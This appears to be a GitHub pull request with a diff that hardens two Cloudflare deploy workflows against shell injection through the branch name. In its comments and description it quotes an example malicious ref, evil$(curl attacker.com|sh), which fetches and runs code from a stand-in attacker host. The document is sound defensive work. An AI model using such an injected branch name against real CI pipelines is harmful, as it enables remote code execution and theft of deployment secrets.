### PR TITLE
fix(ci): close shell-injection in deploy-web/docs missed by #3938

### DIFF
--- a/.github/workflows/deploy-docs.yml
+++ b/.github/workflows/deploy-docs.yml
@@ -47,4 +47,9 @@ jobs:
         env:
           CLOUDFLARE_API_TOKEN: ${{ secrets.CLOUDFLARE_API_TOKEN }}
           CLOUDFLARE_ACCOUNT_ID: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }}
-        run: npx -y wrangler@4 pages deploy docs/out --project-name=librefang-docs --branch="${{ github.head_ref || github.ref_name }}"
+          # Pass the branch name through an env var so a malicious
+          # ref (e.g. evil$(curl attacker.com|sh)) cannot break out of
+          # the run-block via shell expansion.  See deploy-web.yml for
+          # the same fix; #3938 missed both deploy workflows.
+          HEAD_REF: ${{ github.head_ref || github.ref_name }}
+        run: npx -y wrangler@4 pages deploy docs/out --project-name=librefang-docs --branch="$HEAD_REF"

--- a/.github/workflows/deploy-web.yml
+++ b/.github/workflows/deploy-web.yml
@@ -49,4 +49,11 @@ jobs:
         env:
           CLOUDFLARE_API_TOKEN: ${{ secrets.CLOUDFLARE_API_TOKEN }}
           CLOUDFLARE_ACCOUNT_ID: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }}
-        run: npx -y wrangler@4 pages deploy web/dist --project-name=librefang --branch="${{ github.head_ref || github.ref_name }}"
+          # Pass the branch name through an env var so a malicious
+          # ref (e.g. evil$(curl attacker.com|sh)) cannot break out of
+          # the run-block via shell expansion.  Inline
+          # ${{ github.head_ref }} is the canonical GitHub Actions
+          # injection vector — #3938 hardened release.yml and
+          # discussion-to-issue.yml the same way but missed this site.
+          HEAD_REF: ${{ github.head_ref || github.ref_name }}
+        run: npx -y wrangler@4 pages deploy web/dist --project-name=librefang --branch="$HEAD_REF"


### PR DESCRIPTION
Follow-up to #3938 (workflow shell-injection hardening).

#3938 hardened `release.yml` and `discussion-to-issue.yml` against the canonical GitHub Actions shell-injection vector (interpolating `${{ github.* }}` fields directly into a `run:` block) but missed two sister workflows that ship the same pattern:

- `.github/workflows/deploy-web.yml:52`
- `.github/workflows/deploy-docs.yml:50`

```yaml
run: npx -y wrangler@4 pages deploy ... --branch="${{ github.head_ref || github.ref_name }}"
```

Git refnames permit `;`, `$`, backticks, `(`, `)`, `&` — a same-repo PR on a branch named `evil$(curl attacker.com|sh)` triggers RCE on the deploy runner with `CLOUDFLARE_API_TOKEN` / `CLOUDFLARE_ACCOUNT_ID` already in env.

The `if:` guard does restrict the deploy step to same-repo events (push + workflow_dispatch + non-fork PR), so fork PRs aren't exposed.  But "internal collaborator with push access creating a maliciously named branch" is exactly the threat model #3938 was hardening against in `release.yml` and `discussion-to-issue.yml`.

## Fix

Lift the head ref into a step env var and reference `$HEAD_REF` from the `run:` block:

```yaml
env:
  HEAD_REF: ${{ github.head_ref || github.ref_name }}
run: npx -y wrangler@4 pages deploy web/dist --project-name=librefang --branch="$HEAD_REF"
```

GitHub Actions does no shell expansion on env-var values, so the malicious ref reaches `wrangler` as a literal string and is either rejected by the wrangler API or accepted as a long ugly branch name — never executed.

## Out of scope

The same audit also flagged `auto-merge-dependabot.yml` for missing a semver / security-only gate (so a malicious npm/pip release could auto-land on green CI).  That fix is a separate change — `dependabot/fetch-metadata` action wiring + condition rewrite.  Filed as a follow-up.